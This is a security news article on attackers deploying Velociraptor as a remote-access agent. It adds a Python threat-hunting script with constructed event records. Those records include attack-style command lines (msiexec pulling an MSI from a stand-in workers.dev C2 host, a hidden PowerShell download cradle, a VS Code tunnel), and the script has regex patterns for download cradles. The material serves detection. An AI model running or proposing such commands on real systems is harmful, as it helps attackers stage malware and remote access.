Organisations warned to be wary of suspicious tunnelling activity and service installations.
Open-source digital forensics and incident response (DFIR) tool Velociraptor has been abused by threat actors to gain remote control of a targeted network. The attackers installed the legitimate agent themselves and pointed it at their own infrastructure, rather than exploiting a flaw in the tool.
According to an analysis from Sophos' Counter Threat Unit (CTU), reported by GBHackers News, the threat actors used the Windows msiexec utility to download an installer from a Cloudflare Workers domain, which in turn deployed Velociraptor.
After configuring Velociraptor to communicate with the 'velo[.]qaubctgg[.]workers[.]dev' command-and-control domain, the attackers used a PowerShell command to download Visual Studio Code (whose built-in tunnel feature provides an outbound remote-access channel), installed another executable for persistence, and invoked msiexec again to fetch further malware.
Because illicit Velociraptor use is a likely precursor to ransomware deployment, organisations should watch for suspicious tunnelling activity and unexpected service installations, and should deploy endpoint detection and response (EDR) tooling so that such actions can be examined in context, Sophos CTU researchers said.
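The chain above gives a hunt team several concrete signals to look for: msiexec pulling a package from a remote URL, a Velociraptor agent or service appearing where the IR team did not deploy one, a PowerShell download cradle, a VS Code `tunnel` invocation, and any command line touching a `*.workers.dev` host. The following is an added illustration, not code from the article or from Sophos, of how those checks can be run over process-creation and service-installation records. The event records are constructed and simplified (Sysmon EventID 1 and System EventID 7045 fields), the hostnames and paths in them are made up, and the `ProcEvent`/`ServiceEvent` classes and the check functions are this example's own.

```python
"""Hunt for the Velociraptor-abuse chain in constructed Windows event records.

The records below are simplified Sysmon EventID 1 (process creation) and
System EventID 7045 (new service) fields; hostnames and paths are invented.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Simplified Sysmon EventID 1 record: binary path and full command line."""
    image: str
    command_line: str


@dataclass
class ServiceEvent:
    """Simplified System EventID 7045 record: service name and its image path."""
    service_name: str
    image_path: str


URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Cloudflare Workers hosts, as used for both staging and C2 in the reported intrusion.
WORKERS_DEV_RE = re.compile(r"https?://[^/\s\"']*\.workers\.dev\b", re.IGNORECASE)
# Common PowerShell download cradles.
DOWNLOAD_CRADLE_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadFile|DownloadString|Start-BitsTransfer",
    re.IGNORECASE,
)
# Directories an ordinary user can write to; services should not normally live there.
USER_WRITABLE_RE = re.compile(r"\\(users|programdata|temp|tmp)\\", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: ProcEvent) -> list:
    """Return a list of human-readable findings for one process-creation event."""
    findings = []
    image = _basename(ev.image)
    cmd = ev.command_line
    urls = URL_RE.findall(cmd)
    if image == "msiexec.exe" and urls:
        findings.append(f"msiexec installing package from remote URL {urls[0]}")
    if image in ("powershell.exe", "pwsh.exe") and urls and DOWNLOAD_CRADLE_RE.search(cmd):
        findings.append(f"PowerShell download cradle fetching {urls[0]}")
    if image == "code.exe" and re.search(r"\btunnel\b", cmd, re.IGNORECASE):
        findings.append("VS Code 'tunnel' started: outbound remote-access channel")
    if "velociraptor" in image or "velociraptor" in cmd.lower():
        # Legitimate in shops that run Velociraptor; compare against the IR team's known deployment.
        findings.append("Velociraptor agent invoked; verify against the known DFIR deployment")
    if WORKERS_DEV_RE.search(cmd):
        findings.append("command line references a *.workers.dev (Cloudflare Workers) host")
    return findings


def check_service(ev: ServiceEvent) -> list:
    """Return findings for one new-service event (the 'service installations' signal)."""
    findings = []
    if "velociraptor" in ev.image_path.lower() or "velociraptor" in ev.service_name.lower():
        findings.append(f"service '{ev.service_name}' runs Velociraptor")
    if USER_WRITABLE_RE.search(ev.image_path):
        findings.append(f"service '{ev.service_name}' binary lives in a user-writable directory")
    return findings


def triage(events: list) -> list:
    """Return (event, findings) pairs for every event that produced at least one finding."""
    hits = []
    for ev in events:
        findings = check_process(ev) if isinstance(ev, ProcEvent) else check_service(ev)
        if findings:
            hits.append((ev, findings))
    return hits


# Constructed sample telemetry: five rows modelled on the reported chain, three benign rows.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i https://example-c2.workers.dev/stage2.msi /qn"),
    ProcEvent(r"C:\ProgramData\vr\velociraptor.exe",
              r"velociraptor.exe --config C:\ProgramData\vr\client.config.yaml service install"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -nop -w hidden -c "Invoke-WebRequest https://dl.example.invalid/VSCode.zip -OutFile C:\Users\Public\vscode.zip"'),
    ProcEvent(r"C:\Users\Public\vscode\code.exe",
              r"code.exe tunnel --accept-server-license-terms"),
    ServiceEvent("Velociraptor",
                 r"C:\ProgramData\vr\velociraptor.exe --config C:\ProgramData\vr\client.config.yaml service run"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\alice\Downloads\7z2408-x64.msi /qn"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -c Get-Process"),
    ServiceEvent("Spooler", r"C:\Windows\System32\spoolsv.exe"),
]


if __name__ == "__main__":
    for ev, findings in triage(SAMPLE_EVENTS):
        print(ev)
        for f in findings:
            print("   -", f)
```

The Velociraptor check will fire on a legitimate deployment as well, so in practice it is an enrichment step: compare the binary path and the `--config` argument against the one the IR team actually shipped, and treat any other instance as hostile. The `*.workers.dev` check is the cheapest of the five signals but also the one an attacker can change most easily; the tunnel, service and msiexec checks describe behaviour rather than infrastructure and age better.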
Written by
Dan Raywood is a B2B journalist with 25 years of experience, including covering cybersecurity for the past 17 years. He has extensively covered topics from Advanced Persistent Threats and nation-state hackers to major data breaches and regulatory changes.
He has spoken at events including 44CON, Infosecurity Europe, RANT Forum, BSides Scotland, Steelcon and the National Cyber Security Show, and served as editor of SC Media UK, Infosecurity Magazine and IT Security Guru. He was also an analyst with 451 Research and a product marketing lead at Tenable.